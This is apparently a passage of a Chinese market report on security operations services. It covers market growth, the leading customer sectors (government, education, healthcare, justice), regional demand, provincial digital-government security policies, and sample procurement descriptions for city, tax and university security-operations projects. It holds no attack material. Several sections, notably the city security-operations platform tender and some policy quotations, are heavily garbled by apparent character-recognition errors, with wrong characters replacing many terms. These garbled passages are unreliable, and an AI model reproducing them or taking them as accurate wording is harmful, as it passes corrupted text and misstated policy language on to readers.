近2年增长动能不足。网络资产管理市场进入到真正的连续上升期。蜜罐则从2019年Q4 按下加速键,近3年高速增长,成为安全运营市场最受关注的产品。 安全运营服务市场从2018年开始呈现非常高的增长态势,受疫情影响,2021年市场增速出现大幅下滑,2022年增速继续下降至26%,成为过去5年增速最低的一年。 ◆过去5年虽然与整体网安市场保持着平行同向走势,但安全运营服务市场的增长速度还是非常亮眼。无论是高增长阶段还是增速下降阶段,市场增速始终远远高于同期 整体网安市场,即便是情况最糟糕的2022年,也保持整体市场5倍以上的增速。 政府、教育、医疗卫生、公检法司行业占比均超过10%,4行业占比合计超过80%,是安全运营服务市场中的核心行业。其中政府行业由于机构数量庞大,有着更为急 迫的安全运营服务需求,其项目数量已接近市场总量的一半,达到46,6%。 ◆ 4核心行业在过去2年均出现增速的持续下滑,但教育和医疗卫生2022年的增速依然高于整体市场增速,其未来2年的发展情况值得关注。 ◆金融和电信是网安行业头部客户,但在安全运营方面大多采用自建方式,采购安全运营服务采购需求较少,仅从项目数量来看,其并不是安全运营服务市场的主要客户。 政府行业: ◆数说安全将政府划分为39个二级行业,对安全运营服务需求最大的5个二级行业分别为政数局、政府办、税务、财政和住建,项目数合计占比33%,其它二级 行业项目分布则非常分散,绝大多数占比不足2%,因此政府行业对安全运营服务的需求普遍存在于各个政府机构和单位。 ◆全国各地政数局在2019年前后陆续成立,对安全运营服务有迫切需求,从2019年开始项目快速增长,是非常值得关注的政府行业之一。 ◆政府行业安全运营服务个性化需求主要体现在3方面:基础性驻场安全运维服务、政务云安全运营与保障、政府门户网站群7*24安全监测。 ◆教育行业:教育行业市场需求集中在高等教育,占比接近70%,增速稳定。其中高职高专、省属高校需求较大,项目特征主要表现为等保合规建设和智慧校园作为前 导因素所延伸出的安全运营服务需求,大多数以基础安全运维为主。在成熟度高的用户中,已在整体或局部业务上采用MSS 安全托管服务模式。 ◆ 医疗卫生行业:医院作为医疗卫生的核心市场,占比超过70%,其中整体上三级医院占比较高,区县级医院开始呈现上升趋势,其中福建和四川在2022年出现比较快 速的增长。医院对安全运营服务需求更为细致,但业务连续性保障和勒索防护仍然是目前最核心的诉求,同时有部分医院在门户业务上已经开始采用MSS 安全托管服 务模式 。 4大行业项目主要分布在传统网安市场的核心区域,包括北京、浙江、广东、江苏,且保持稳定增速。福建、湖南、四川在2022年,在4大行业上呈现出高增长态势,项目 数量已逼近核心区域。 ◆在非核心行业中,广东交通、广东企业、广东能源化工、北京能源化工、内蒙古能源化工,是具备一定项目底量、且在2022年保持快速增长的区域市场,其余还没有增速 突出的大体量区域市场。 ◆ 4大核心行业中,由于政府和公检法司对驻场运维有较强需求,因此项目金额中位数已接近50万,显著高于教育和医疗卫生30万的水平。 广东、北京、浙江是安全运营服务需求最为旺盛的3个省份,区域项目量超过3000;2000项目量级的省份包括福建、江苏、湖南、四川;达到1000项目量的省份包括 山东、安徽、湖北,这10个区域是安全运营服务的核心区域市场,合计项目数量达到整体市场的三分之二。 ◆在增速方面,31个区域,除了天津和海南,其余29个区域均呈现出全面高速增长的态势,5年复合增长率平均值接近80%,其中TOP5 区域增速均超过50%,部分小体量 区域甚至超过100%,由此看,无论是经济发达地区,还是经济发展中地区,安全运营服务在近些年受到客户的广泛认可,市场需求持续释放,从客户覆盖率的角度看, 未来3-5年市场仍存在较大上升空间。 ◆数字政府建设仍存在一些突出问题,主要是顶层设计不足,体制机制不够健全,创新应用能力不强,数据壁垒依然存在,网培安全保障体系延有不少哭出短板,千部队伍 数字意识和数学素养有待提升,政府治理数字化水平与国家治理现代化要求还存在较大差距。 +建空健全动态监控,主动防御 协同响应的数字政府安全技术保障体系。充分运用主动监测、智能感知、威胁预测等安全技术,强化日常监测、通报预著。应急处置,拓 展网络安全态势感知监测范围,加强大规模网络安全事件,网络泄密事件预警和发现能力。 《山东省“十四五”数字强省建设规划》鲁政字[2021]128号 ◆增强专业化安全防范能力。建立对全省数字政府政务信息系统,数据资源的安全监测和检测体系,准确识别安全风险,提升安全监测检测能力。实施全省重点行业点对点 防护策略,加强智慧交通、智慧能源,数字水利等重要基础设施的安全防护工作,确保基础设施运行状态、风险隐患实时感知。建设数字政府安全运营中心,强化跨领域 网络安全信息共享和工作协同,提升网络安全咸胁发现、监测侦当应急指挥、攻击湖游能力。 ◆建设数字政府安全运营中心,成立安全运营机构。完鲁两络安全态势感知平台,扩大安全态势感知平台范围,推进其与业务系统的对接,与国家,网信、公安等平合完成 数据对接,推进省市两级平台互联对接,形成全省一体化安全监刚能力;强化电子政务外网安全监测、政务云安全监管,加强电子政务外网监测节点部署,增加云上采集 能力的部署和完善;加强政务网络整体的资产测绘及漏洞感知能力;加强平台Al分析能力。建设安全协调指挥平台,基于原有安全态势感知的基础数据能力,实现对网络 安全整体工作的协调统筹指挥,实现对各类安全风险的统一管理。 《江苏省政务“一朵云”建设总体方案》苏政办发[2023]36号 ◆建立具备纵深防御,态势感知和智能分析等能力的全省政务“一朵云”安全防护体系,从物理安全、云安全、数据安全和密码应用安全等层面进行立体防护。 ●建设包含感知监测、分析预警。指挥联动,应急处国、溯源分析、支全优化、外包管理等全流程的安全运维体系,提升响应效率,简化协同流屋,离效保降业务安全可 幕、持矮稳定运行。感知监测覆盖威胁告警、风险管理、漏洞管理等功能,实现资产清、位置清。态势清、异常清。分析预警将人工智能技术和监测数据有机结合,实 现安全风险智能分析、秒级识别,动态预警。指挥联动实现横向到边。纵向到底、联动协同的自动化和智能化调度,提升日常态和应急态的安全协同能刀。应急处置提 升安全事件发生后的响应效率,加强攻防演练和重保看护,实现可演进的安全应对处置能力。潮源分析针对攻击事件进行调查取证,对攻击链条进行重新审视,确保递 告及时,处理有效,责任到人。安全优化针对安全检测发现的安全漏洞等薄弱环节,进行持续安全策略优化,流程优化和技术加固。 《浙江省人民政府关于深化数字政府建设的实施意见》2022.8 ●构筑公共数据全生命周期安全防护体系,推进数据加密、数据脱敏,数据水印、数据备份,数据溯源,隐私计算等技术能力全面应用,强化网络安全主动防御能力,监 测预警能力、应急处置能力.协同治理能力,全面提升云。网、终端、数据.应用防护能力。强化个人信息保护,加强数据安全业务培训、技术防范和应急演练。 数说安全研究院 政府行业安全运营垂直政策(续) 《广东省数字政府网络安全指数评估》2020.12 φ为应对数字政府面临的安全威胁和严峻挑战,引导数字政府网络安全防护体系建设工作,持续提升数字政府网络安全防护水平,2020年广东省发布了国内首个数字政 府网络安全指数。评估依托数字政府建设运营单位掌握的数字政府安全运营数据。网络安全监管部门掌握的数字政府安全监管数据。安全调研数据,网络安全厂商及互 联网公司掌握的省域网络安全大数据,”粤盾-2022”数字政府实战攻防演练结果数据等,采用定量与定性相结合的分析方法,对全省各地市数字政府网络安全管理, 安全建设、安全运营、安全效果等四个方面进行评价,客观科学地反映我省各地市数字政府网络安全整体防护水平。2022年广东省数字政府网络安全指数为百分制,其 中 、安全曾理,安全建设、安全运营,安全效果4个一级指标分别占25%、20%。25%、30%。 安全运营指标用于评价数字政府网络安全保障体系在运行过程中的风险识别,安全监测及应急处置等能力,包含信息资产管理、日常安全运维支全监测,应意处置 安全检查、安全审计。业务连练性保降安全协同8个方面。重点通过摸清资产底数,及时发现风险隐患,采取相应的处置措施,形成联防联控的强大合力,确保数字 政府网络安全防护体系稳定运行。 《广东省数字政府基础能力均衡化发展实施方案》2022.10 ◆齐头并进全面推动数字政府各领域均衡发展:2019-2022年,省财政主要支持14个欠发达地市提升政务信息化基础设施、“一网共享”。安全保障体系等方面《实 施方案》与上一轮支持政策相比,支持领域和措施更加全面具体。网络安全方面,包括强化政务云基础安全保障和数椐安全保障,推进政务领域商用密码应用等。 《河南省数字政府建设总体规划(2020—2022年)实施方案》豫政办〔2021〕50号 ◆强化安全保障。建设公共安全资源池、安全监管平台等,实现全程留痕和可追潮。落实信息安全等级保护,密码应用安全性评估及风险评估制度,定期开展信息系统安 全风险测评和攻防对抗演练。建立数据风险排查和防控机制,发挥省政务服务平台枢纽作用,实现跨部门、跨地区数据共享全流程监管,追溯和数据异常使用预警。 (省大数据局、公安厅、省委网信办牵头,各省辖市政府。济源示范区管委会、各省直管县【市)政府、省直各部门配合), 《长沙市加快网络安全产业发展三年(2019—2021年)行动计划》长政办发[2019】30号 ◆建设网络安全运营及应急响应中心。加大财政投人,搭建网络安全运营及应急响应中心,建立网络安全靶场、淘练平台,实训基地和攻防实验室。面向企业提供安全规 划体系论证、技术研发和验证、攻防演练演习、安全风险评估和安全培训等服务,定期组织大规模网络安全实战演练。建立跨部门,跨地区的应急处置平台,推动数据 共享,联动响应,第一时间处置网络安全威胁,提升整体网络空间及重点行业安全能力,全面提升城市安全治理水平。(牵头单位:市委网信办,责任单位:市工业和 信息化局,市公安局、市数据资源局) 支持研发创新平台建设。加快长沙网络安全研究总院、适配中心、测评中心、运营服务中心等重大公共服务平台建设,平台建成投产后,给予平台磁设责用30%的补助 单个干台最商500万元。平台投人运营前三年,按实际产生服务费用给予全额补贴,单个平台最高500万元。(责任单位:市工业和信息化局、市财政局) 当前xx市正处于新型智慧城市和数字政府建设的关键时期,政务云底座、 城市超级大脑、智慧交道、智慧医疗、智慧文旅等一大批数字基础设施 和智慧应用服务建设正稳步推进。市委市政府为深入贯彻国家网络强国 的战略目标,快速提升xx市城市整体网络安全防控水平和治理能力,助 力城市数字经济发展和国家网络安全产业园区建设,保障xx市新型智慧 城市示范城市和数字政府的高速安全稳定,制定并发布《xx市加快网络 安全产业发展三年(2019-2021年)行动计划》,明确了建设xx城市网 络安全运营中心,提升城市整体网络空间和重点行业安全能力,全面提 升城市安全治理水平的工作任务。 项目建设内容 项目主要包括两部分: 1、面向市委网信办的城市网络安全监测预警与指挥调度:主要针对xx 市委网信办的属地网络安全管理职责,侧重城市网络安全监管治理和应 急 响 应 ; 2、面向市大数据中心的政务网络安全运营:针对xx市新型智慧城市和 数字政府建设的各类信息系统,即xx市大数据中心自建和全市各委办局 已上云的各类业务系统,提供网络安全运行保障和运营服务。 项目中涉及的部分信息化基础设施、软件平台及其配套的实施,采用租赁 服务模式,服务中标人应形成本地化服务能力,为采购人提供持续服务。 平台建设 建设城市网络安全监测放警与指挥调度中心,导入外都安全盖测数据,实现对城市间绉安全事件的实对监测、成肪采源分析和组织情报分析, 前醋操针部客 在全市60家政府、医厅,教育,交通,金底。传国币政等更点行业和重点监管各标单仪到1306的与联网出口,部善流量安全花测系针,家现则网络 收击,网页漏海利用。后顺水马APT事件等多种收击行为的检测。 资产盘点 并展全市互联网资产信息源拾,建立全市互联同IP地址库、域名库和互取资产信息指纹库,掌按城市互联网资产集露面。 同贴监测 针对全市2000个重点者案网站进行实时安全些测,防止重要同站系统出现建要及访间异离要不良懂况造成的思劣社会要响 安全应急网应中心 建设城市网终安全应急响应中心,为城市网组安全放急指框提供场地保障;并展7*24小时的城市网络安全监管起营限务以及定棉的专师安全服务。 应急腐应机制 开展城市同终安全应危演练,每年通过造请攻击队,面向x市美点行业和重要后意系统设施开属一次安战化网终五余这防流习和网终安会现场检查, 被验参演单位网络安全理设成效,检验并员国网络安全事件应急间西机制。 网绝安全风经修复 通过实战攻防演练及时发现目标属路安全风险并提供修复指导。 开展网络安全置传数育,结合同家网络安全宣传同等场数,何华面向双市民开同一次10个主题日的两头安全宣传活动,面向全市100家室点单位的网 垫安全负费人,开展网编女全西急.网缩安全重保寄工作的验育培州。 政务网络安全运营(市大数据中心) 平台建设 建设政务网络统一安全管理平台,配营盗产安全扫描。服弱性扫推,基些核查,或胁检源,流量检测。文件沙箱,虚顶训捕等安全工间,实现对市电 子改务外例。市政务云的同名安全监测教据的梁集和要中有健,提供测终安全态类满知,安全数据买集、安全分析研判、系统安全钢理、安金资源统 一纳省等功情。 安全提外却需 在含区且(币)9个的据资源低门以及6个市直部门的政务外器和数据中心部型流量安全检要杂针,通过对网给攻击,网英测测利肃,病南木马。APT 里件等多种攻击行为的检测,实现对各区目(市)和6个独立机房市血部门的网终安全监管,并院月发布一次考校结果。 城市定络安全 估果观划设计 结合《x市所型智事城市示慈减市项层设计及和《8x市新型智慧城市示范城市建设三年(2021-2023年)行动甘制》,规划设计Xx市新型智慧城市 部体肉结安全体系,编制《xx市新型留制液市间络安全师层设计》。 政务间络安全管理体 系建设 结合心市智意板市建说现状,安制以背就城市网络安全政荣制度、技术规范和管理制度(数量不少于30个)。面向x市大数据中心的估息化建没全 生命周期制定政务网络安全管理宝施级则和技术流慧,提供安全管煤刷流。安会管理机构,安全假理入员,安余建议管理。安会征维售理等方面的卷 填胶务。 改务网路女全运营 对市电子政务外国,市政务云以及各区县(市)数病资源制门,开发区/国区电子政务外网和数据中进行7*24小时安全盖测分析,推进政务网络安全 态势形测、事件分析,政击防护和应象响应的安全读行闭环,吴着网络安全应急预案,协助指导相共单位完成安全处置和安全整改修复。 带态化函糖安全检查 面向市大数据中心月建的各类重点信息基础设病,信息风缩和应用系统开展网组安全高经准透测证,代码安全检查。放市诱情分析。APT高级度胁分 折写,防范Oday或三他高危高河释磨造成安全事故的发生。 场景化的网治 安全保牌 在重点特护时期如“二十大”以及重大节假日,或发生重大网络安全夹发事件时,提供专业安全夜不保障和应意响应力量,对重布特护对激开版重点 保护工作,或者对重大网络安全事件提供紧急处置和静题分析。 安全键设成效管检 对各做用开发商,云展务商,安全的务雨的安全建设或效进行些督检查,并每学设发布一次考核钾价结果。 网络安全枝能培训 面网全市政务和普基城市建设单位的信息化与网络安全开发维护人员拼供考业的网络安全培州。 项目 背景 《xx省“十四五”数字强省建设规划》中明确指出“坚持总体国 家安全观,聚焦数字基础设施、数字政府、数字社会建设等重点 领域,支撑数字经济与生态的融合发展,打造“责任明晰、安全 可控、能力完备、协同高效”的网络安全体系”。 参考国内外各类大型承载复杂业务的信息化系统运行模式,考虑 建立我省数字政府安全运营中心,采用体系化的安全模式,按照 持续运营演进方法,同时引入智能化的安全分析技术,提供自动 化结合专家的安全处置手段,以及加强基于情报的事件研判机制, 实现安全防御能力在数字政府领域的持续、真正落地。 项目建设内容 1、建立数字政府安全运营体系,在标准流程化的方式下完成省 级数字政府基础设施及业务平台的安全运营工作,并向其他省级 单位和地市大数据管理部门提供安全运营体系模板,让安全运行 管理更加标准、统一。安全运营体系服务范围为省本级大数据管 理部门相关云、网及应用。 2、 建立大数据安全实训平台,实现网络安全领域政产学研全链 条的有效衔接。在促进政企学研协同创新的同时,全面提升数字 政府相关工作人员的安全创新和实践能力。 安全运菅支撑平台---核心功能要求 ◆事件分析与处置:在数字政府安全运营工作中,包含大量针对安全攻击行为进行 有效分析与跟踪的相关工作内容。为了改变分析过程以文档形式编纂导致无法对 安全案例进行复盘及检索的弊端,系统在分析任务交叉确认的基础上,将完成有 效性验证环节的分析成果进行卷宗化存储,便于安全决策人员对运营成果进行复 盘及参考。 ●测试管理:在数学政府安全运营过程中,系统依据网络安全技术及管理要求,将 渗透测试内容维护为细颗粒度的测试项,并将不同的测试项依照不同的测试场景 组合为专用测试矩阵,规范安全运营人员在开展渗透测试过程中的测试流程及测 试内容。 ◆考核评价管理:在数字政府安全运营过程中,需要对安全运营人员的工作状态进 行评价。通过收集各运营流程环节的工作数据,能够对运营工作的效率、准确性 进行分析测定;对运营过程中发生的各项任务状态进行追踪,协助运营团队对安 全运营工作内容进行指导和评价。 ◆运营脚本;数字政府安全运营中心是以多级分析师协作的形态构建整体安全运营 分析流程,但由于事件分析能力主要以高级分析师为主要输出来源,单纯以培训 的方式向安全运营监测前线人数最多的一线分析师输出分析经验难免会产生遗漏, 经常性的分析流程改进也影响学习连续性,并且无法对一线分析师的分析过程进 行有效评价。为了完成上级分析师向下级分析师传递分析思路、处置思路、知识 经验的目标,同时建立安全运营不同层次、不同角色间的工作内容及协同机制, 平台需要具备“运营脚本”指导运营团队进行安全运营分析工作。 ◆报告管理;在数字政府安全运营工作中,会产生大量的安全运营成果报告,因此 需要系统提供自动化的报告统计编纂能力,减轻安全运营入员工作压力。 网络安全协调指挥平台---核心功能要求 ●政务资产管理服务:政务安全的目标是保障政务系统的完整、可用,为了确保政 务系统的安全通畅,明确发生的政务系统安全问题的属主机构,有针对性地开展 技术调度,同时对安全问题的处置状态进行跟踪。通过对政务资产进行汇总管理, 从而“摸清家底”;明确政务体系安全防卫范围。 φ漏洞聚合管理:漏洞隐患对政务系统的影响情况是定期评估各地市政务系统安全 状态及监管能力的关键要素,通过收集汇总各地市政务系统的漏洞数据,分析计 算出周期范围内各政务资产脆弱性分值,并根据同比和环比的方式说明政务体系 施弱性安全现状,结合漏洞整改比率,对各地市大数据局实行安全风险提示及漏 洞处置协调跟踪。 ●事件聚合管理; ◆1、平台具备省级安全事件监测能力。通过依托省大数据局建立的全省政 务外网监测体系的安全威胁监测能力,安全专家能够将发现的政务外网安 全事件进行汇聚,并对安全事件的详细内容进行维护。监测到的安全事件 通过协同处置服务模块发起事件协同流程,协助相关地市大数据局或属主 单位完成事件的处置工作。 ◆2,平台具备地市安全事件上报能力。除漏洞外,能够汇聚各地市大数据 局监测到的政务系统安全事件。检查管理;安全检查为省大数据局监督地 市大数据安全工作的重要手段。需要定期或临时性发起各类安全检查工作, 以评估真实安全状态。 *热点应急管理;在安全管理工作中,数字政府运营中心需要对应急性工作进行支 撑,应急性工作包括突发性安全专项问题、上级通报等。因此,系统需要具备热 点应急管理功能对相关应急任务进行管理与归档。 按照省数字化改革网络安全工作有关要求,建设数字化安全运 营平台。本建设内容作为统一运营管理平台的网络安全模块, 完成与统一运营管理平台的对接。安全运营平台接入范围覆盖 省发改委重点信息系统。构建统一态势感知,统一通报预警, 为持续提升委网络安全监测、预警、聚焦,处置工作水平提供 有效支撑;落实常态化安全检测、安全监测、安全应急等工作 通过安全技术服务,发现网络安全隐患和漏洞,不断提升风险 管理和应急处置水平,保障信创OA系统和发改大脑应用的安 全运行 建设省发展改革委安全运营平台。覆盖省发展改革委重点信息 系统。实现政务云租户环境、经济信息中心机房的数据采集和 处理、安全分析、态势感知、通报预警。将平台作为统一运营 管理平台的网络安全模块,完成对接。 系统将满足信创适配要求,适配国产机及国产操作系统、浏览 器等软硬件客户环境,如适配龙芯、鲲鹏等主流硬件架构,适 配中标麒麟等主流操作系统,适配红莲花、360等主流浏览器。 将已有的、互相隔离的,分在政务云租户环境内、机房的安全数据打通,对于 已有的安全数据,实现安全数据的统一汇集与利用。实现省发展改革委政务云 租户环境、机房已有数据集成接入后的清洗,补全、关联、标准化、存储与处 理,形成可用的数据字典、索引,支撑实现安全运营应用。 利用安全数据对省发展改革委政务云租户环境、机房的网络日志、流量日志, 安全告警等数据,应用。匹配安全分析模型,发现安全隐患,形成分析结果数 据,支撑上层应用。 实现省发展改革委政务云租户环境、机房整体安全状况可视化,提炼安全指标 有效提升安全工作效率的重要保障。统一安全可视态势感知的功能建设需求, 需具备基于汇聚统一的安全数据的分析能力,能够展示出不同的安全视角体现 省发展改革委不同安全域、不同系统的态势视图,反应全局的安全威胁、安全 隐患与安全事件。 将省发展改革委网络安全工作在政务云租户环境、机房整体串联、及时发现, 通报预警模块 有效处置的重要支撑,也是实现“数字化改革”中构建实战化重要节点安全防 控体系、完善应急处置机制、提升应急处置能力的必要支撑。 完成与统一运营管理平台的用户体系,数据接口、应用界面等的对接,应用页 面与统一运营管理平台进行统一入口集成与页面集成,实现一屏展示的效果。 “十四五”规划中明确提出,要提高数字政府建设水平,加强公共数据开放共 享,推动政务信息化共建共用,以及提高数字化政务服务效能。在“十四五” 期间,国家电子政务网络建设,集约建设政务云平台和数据中心体系,推进政 务信息系统云迁移成为核心任务。政务上云已成为各地政府数字化转型的必选 项。通过基于统一的政务云平台,加强数据共享互通。政务云已成为数字政府 数字城市建设的关键基础设施。 Xx市政务云平台节点是省级政务云的安全边界和延伸,是保障地市政务信息系 统安全可靠运行的重要载体。根据全省一体化安全标准的要求,地市政务云平 台节点应该实现与省级政务云一致的全能力安全保障。 为贯彻落实《国务院关于加强数字政府建设的指导意见》工作部署,按照全省 “一盘棋”的原则,统筹规划和布局数字政府基础设施和平台支撑体系,以各地 级以上市为建设主体,从2022年起分三年完成数字政府基础能力均衡化发展指 标任务,有力夯实数字政府建设根基。要求完善政务云基础安全保随体系。各 地要统筹开展本地区政务云平台网络安全设备改造升级、攻防演练与安全测评, 巩固提升政务云基础防护能力和安全运营支撑能力,推进本地安全运营平台与 省级安全运营平台对接。《xx省数字政府基础能力均衡化发展指标任务执行标 准》明确了健全政务云基础安全保障体系的工作要求, 一是各地建成“云管端” 一体、管理与技术防护并重的网络安全体系,覆盖网络攻击发现、通报、处置、 湖源,打击全流程。二是各地利用大数据分析、自动化编排等技术,开展集中 化.自动化、智能化的安全运营,提供覆盖全生命周期的安全服务能力。 本项目将从原有安全设施运维服务,新增安全设施服务和安全运营服务三个方面为政务云平台xx市节点 提供安全保障,完成我市分节点平台安全设施保障及安全运营平台运营工作。实现xx省“数字政府”省 市一体化安全运营的目标,满足“全局统筹,跨网联动、多维感知,智能闭环,安全可视、合规运行“ 的网络安全新时代要求。 安全运营平台软硬件设施维保服务 安全运营配会硬件设施迅维服务:主要提供安全态势感知服务器,地市节点专用交换机、地市节点专用服务器等配套硬件设备运维服务。 云平台安全设备基础设施运维服务:主要提供网络入侵防护系统(IPS)、DDo5防护设备、主机安全防护系统云镜服务、堡垒机、网络安全审计、 集中日志审计系统、APT检测系统、云平台Web应用防火墙服务、云平台漏洞扫描服务、云平台基线配置核查服务等。 安全资流池运堆服务:包括虚拟下一代防火墙组件、虚拟VPN、虚拟漏洞扫描、虚拟基线核查、虚拟堡皇机、虚拟数据库甲计、虚拟网络安全审 计.虚拟日志审计、虚拟增强型网页防火墙和虚拟网页防墓改等虚拟化安全资源组件,为租户上云提供满足等保2.0等安全合规要求的安全能力, 为本市云平台节点提供全能力的安全防护服务,同时为省市一体化安全运营平台股务提供安全数据源。 智能网络流量检测运维服务:通过镜像端口的形式对政务外网网络流量进行检测,可检测数据中心内部存在的安全威胁及恶意流量,同时能够识 别网络协议,租户网络行为,根据网络行为智能判断攻击成胁并采取对应行为。本期为智能网络流量检测软件服务提供运维服务,包括日常在线 响应用户使用过程中遇到的问题,对软件进行日常更新运维,日常排检等内容。 省市一体化安全运晋平台及态势露知服务:基于运营中心原始日志数据,安全分析数据,结合外界(国内外)互联网安全态势总体情况对当月的安 全运营态势进行分析研判并在大解显示。 新增安全设施服务 新增安全设施服务包括堡垒机授权、抗DDo5服务,智能网络流量检测系统(攻击阻断)、入侵防御,政务云业务网站监测服务、威胁情报服务、省 市一体化平台自动化编排服务、资产发现与风险管理平台、VPN与堡垒机国密改造、主机安全防护系统云镜升级版服务、主机安全防护系统云镜 升级版授权等。 安全运营服务 安全运喜支撑:加强地市安全运营团队建设,组建省市两级覆盖威胁监控分析、攻击防护处置,风险预警通报、应急演练的安全运营团队,优化 运营规范制度,实现本级云网常态化7*24小时(省中心远程和地市现场结合)网络安全运营安全。 重保限务:通过现场值守、应急响应,突发事件处理等方式,为机关单位提供重大事件期间重要信息系统安全技术服务,确保各单位在重大时期 间能够及时应对各类信息安全突发事件,保障网络与信息系统安全稳定运行,做好重要时期的信息安全保障工作。 其他安全服务 上线安全测评服务:提供系统上线安全测评服务,服务包含编制测评方案、安全渗透、端口扫描、弱口令检查、基线配置检查、编制报告等内容, 网络安全指数评估服务:支撑和指导xx市系统梳理2022年和2023年指数评估情况和现状,识别差距,找出关键问题,提出2023和2024年xx市数 字政府网络安全改进建议和方向,制定整体提升方案,并指导xx市政数局及各市直部门落地实施,提升xx市数字政府网络安全整体防护水平。 项目背景 近年来,税务总局在金税四期网络安全规划建设中,将建设智能 安全运营中心列为一项重点工程,将其作为网络安全工作的重要 支撑和有力抓手,力争实现安全防护自主可信,安全态势可知可 见,安全现状可管可控,安全事件闭环运营。 项目内容 购买网络安全运营服务,完善我局的网络安全运营服务体系,协 助我局提升安全整体规划管理,完善安全管理制度,优化安全管 理流程。以整体安全运营的理念将网络安全服务、CDN网络加速、 SSL证书服务、互联网高危漏洞检测挖掘和众测服务、数据安全运 营服务以及14个系统的数据安全风险评估工作等安全服务进行全 面整合,达到全面提升网络安全监控、预警、响应、处置、应急 等综合能力。 人员要求;驻场团队至少4人,其中3名网络安全运营驻场工程师 +1名数据安全运营驻场工程师;攻防演习防守团队需1名安全专 家+2名高级安全工程师;应急支撑团队需要5人,按不同角色需 保证1-2小时内到现场;重保服务团队需配备9名现场保障人员。 根据《全省一体化数据基础平台迭代工程等四大工程工作方案的通 知》要求,开发建设xx 市安全运营(监测)平台,保障省一体化数 据基础平台xx市级节点的稳定运行,将技术、管理、人员和服务进 行有机结合,实现网络安全事件监测、响应,指挥调度以及对云安 全、网络安全、密码安全,应用安全,数据安全的监控,建成上下 级平台贯通的全链路防护、检测、预警、处置、反馈体系。平台明 确各类业务数据在数据全生命周期各个业务场景下保障要素,以合 规为基线,以业务流程为导向,结合制度规范,建立完善的数据生 命周期的为安全保障和监管措施。同时建立安全监控预警、信息通 报和应急处置机制,逐步实现从“基于威胁的被动保护”向“基于 风险的主动防控”转变,形成网络安全和数据安全的保障闭环。 《国家智慧教育公共服务平台接入管理规范(试行)》教科信厅函[2022】33号 ◆接入国家智慧教育门户的平台应纳入教育部统一运行监测的范围,统一部署运行监测手段,通过对接方式自动获取用户访问、资源目录,使用评价、网络安全等方面的 数据,建立基于大数据的平台评价机制。 教育部网信办建立平台网络安全监测预警通报机制,及时发现平台的网络安全隐患,并指导平合主管单位进行修复。定期组织智惹教育平台开展攻防演习,提升网络安 全保障水平。平台主管单位应密切关注平台安全状况,发现平台运行故障、页面德改等网络安全事件应及时按照《教育系统网络安全事件应急预案》进行报告,并采取 有力措施及时处置,将影响降到最低。 《山东省教育信息化“十四五”规划》2022.5 ◆虽然我省教育信息化建设取得了显著进展,但由于顶层设计不够,资源投入不足等原因,存在基础设施支撑水平不足。优质教育资源供给能力较弱、信息化环境下教育 教学模式创新不够,网络安全保障能力有待提升等问题。 ◆持续完善网络安全防护体系,全面落实《网络安全法》《数据安全法》《个人信息保护法》等法律法规要求,严格遵循网络安全等级保护技术标准。重点保障教育系统 关键信息基础设施,提升国产密码在网络安全防护中的应用水平,优先选用具有自主核心技术的安全可控产品和服务。推进教育系统全域网络态势感知系统建设,增强 感知能力、保障绿色上网。推动可信应用,提升网络安全事件监测、研判、预警和应急处置能力。 ◆提升省级教育网络和数据安全水平,健全基于全流量分析的安全监测处置中心,配齐用好网络安全设施设备,全面加强安全技术防范措施,开展数据全生命周期安全管 理,保护教育行业关键信息系统和重要数据。定期开展全省教育网络安全检查和攻防演练,通过攻防对抗、沙盘演习等方式,提升网络安全防护能力和应急响应水平。 河南省教育厅《2023年教育信息化和网络安全工作要点》教科技函[2023]99号 ◆提升网络与数据安全管理水平。健全网络安全监测和事件应急处置体系。通过建立中枢、整合平台、对接数据等方式,扩大监测范围。提高监测深度,构建“一点发现、 全网防御”的主动型网络安全防御格局,变单个学校独立防御为全省教育系统协调联动,联防联控。建立常态化网络安全应急响应及支撑服务团队,构建统一指挥,多 级调度、协同处置的网络安全联动响应机制。常态化开展网络安全攻防演练。(责任单位:厅机关有关处室) 《中共陕西省委教育工委陕西省教育厅2023年教育网络安全和信息化工作要点》2023.3 ◆完善网络安全防护体系。健全网络安全责任制,加强关键信息基础设施保护,开展信息系统网络安全等级保护工作。持续开展网络安全监测预警,完善全省教育系统网 络安全通报机制,提升网络安全态势感知能力。建立智慧教育平台全天候保隧机制,保障平台安全运行。加强教育数据全生命周期管理,探索建立健全数据分类分级管 理制度,重点保护个人敏感信息和未成年人信息,维护教育数据主权。组织开展全省教育系统网络安全攻防演练,提升网络安全攻防对抗和纵深防御能力。深入开展委 厅机关和教育行业国产化替代工作,摸清底账,制定替代工作方案和推进计划,开展检查督导工作。 项目背景 学校数据中心承载着我校大量的业务系统,如站群系统、数字化校园、智 慧校园、 一站式服务大厅等业务系统等,由于我校目前网络安全建设非常 薄弱,缺乏有效的安全防护技术措施,安全管理制度以及安全审计措施 网络安全隐患越来越突出,随着国家实行网络安全等级保护制度2.0,依据 《中华人民共和国网络安全法》,国家实行网络安全等级保护制度,我校 需要实行网络安全等级保护制度,建设有效的安全体系抵御外来和内在的 安全威胁,如安全漏洞、网站篡改、数据泄密等情况。 项目建设内容 据我校网络安全现状结合等保二级要求,完善校园网络安全建设,要求必 须通过等级保护测评。第一由于缺乏专业的安全设备导致无法建立完善的 安全防御体系落实网络安全等级保护制度。第二由于缺乏专业网络安全技 术人员,导致安全工作落实不到位。介于以上情况,拟通过采购网络安全 建设运营服务的方式落实校园网络安全等级保护建设与安全运维工作。 在合同服务期限内,采购产品服务和安全服务: 1、等保建设必要的安全设备实施部署、维护、升级服务,要求提供的安 全设备必须保证校园网稳定运行,设备故障免费更换备件。 2、采购资产梳理、漏洞评估、安全维护、安全加固、网站监测、应急响 应、安全预警等安全服务,并采购专职安全工程师5*8小时驻场服务。 项目背景 xx中医药大学办学基础为创立于1924年的xx中医药专门学校,是新中国首批四所高 等中医药本科院校之一。2020年成为xx省人民政府、教育部、国家中医药管理局共 建单位。在末来,xx中医药大学按照国家高级标准学校,拟通过对校园信息化系统的 全盘规划和统筹升级建设,从数字校园向智慧校园阶段迈进。所以学校应建立配套的 常态化、长效化新型安全运营指挥技术和管理体系,通过自动化手段实现安全事件处 置、隐患发现,完善应急指挥机制,建立设备资源、人力资源、管理资源之间的高效 协同,对安全事件进行及时有效处置,实现统一的网络安全协同运营,保障学校网络 安全稳定运行,业务系统持续安全运转。 项目建设目标 本次服务项目以学校服务器、核心业务系统等IT资产为保护对象,依据网络安全法、 等级保护和相关标准规范,践行安全“实战化对抗、安全有效,由基本合规式安全转 为实战化安全”的理念,定位于构建常态化的网络安全实战攻防对抗能力,同时围绕 